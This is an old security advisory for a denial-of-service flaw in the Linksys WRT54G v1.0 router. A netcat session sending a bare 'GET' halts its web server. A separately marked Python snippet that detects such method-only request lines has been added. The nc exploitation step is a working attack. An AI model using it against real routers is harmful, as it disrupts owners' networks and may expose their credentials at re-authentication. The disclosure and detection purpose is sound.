Sending a blank GET request to a Linksys WRT54G v1.0 (firmware v 1.42.3) router results in a denial of service.
Linksys WRT54G Denial of Service Vulnerability
carbon@techcentric.net - 12/02/03
System(s)
===========
Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
Detail(s)
===========
Sending a blank GET request to the router on port 80 (or 8080) halts the
embedded webserver. This may allow an attacker to force the owner to
reboot the router, allowing the attacker to gain sensitive information
during router authentication.
Exploitation
============
user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$
Solution(s)
============
- The HTTPS service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and
performing any authentication.
- Wait for a vendor patch :)
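Added example (not part of the original advisory): a Python check that a sensor or filtering proxy in front of the router could run on the first line of each HTTP request, flagging the method-only request line shown under Exploitation. The function names, addresses and payloads are constructed for illustration.

```python
import re

# Request-line shape from RFC 7230 section 3.1.1:
#   method SP request-target SP HTTP-version
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
REQUEST_LINE = re.compile(rf"^{TOKEN} \S+ HTTP/\d\.\d$")
METHOD_ONLY = re.compile(rf"^{TOKEN}\s*$")


def classify_request_line(raw: bytes) -> str:
    """Classify the first line of a request: ok, method-only, empty or malformed."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    try:
        text = line.decode("ascii")
    except UnicodeDecodeError:
        return "malformed"
    if not text.strip():
        return "empty"
    if REQUEST_LINE.match(text):
        return "ok"
    if METHOD_ONLY.match(text):
        # A bare method with no target or version, e.g. "GET" then newline.
        return "method-only"
    # Everything else, including version-less HTTP/0.9 style lines.
    return "malformed"


def flag_sources(capture):
    """Return {source address: count of method-only request lines}."""
    hits = {}
    for src, payload in capture:
        if classify_request_line(payload) == "method-only":
            hits[src] = hits.get(src, 0) + 1
    return hits


# Constructed sample: (source address, first bytes of the TCP payload).
SAMPLE_CAPTURE = [
    ("10.0.0.23", b"GET / HTTP/1.1\r\nHost: 10.0.0.1\r\n\r\n"),
    ("10.0.0.57", b"GET\n"),
    ("10.0.0.23", b"POST /form HTTP/1.0\r\n\r\n"),
    ("10.0.0.57", b"GET \r\n"),
    ("10.0.0.99", b"\r\n"),
]

if __name__ == "__main__":
    for src, count in flag_sources(SAMPLE_CAPTURE).items():
        print(f"{src}: {count} method-only request line(s)")
```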
Status
============
Vendor contacted on 12/03/03.
!HAPPY HOLIDAYS!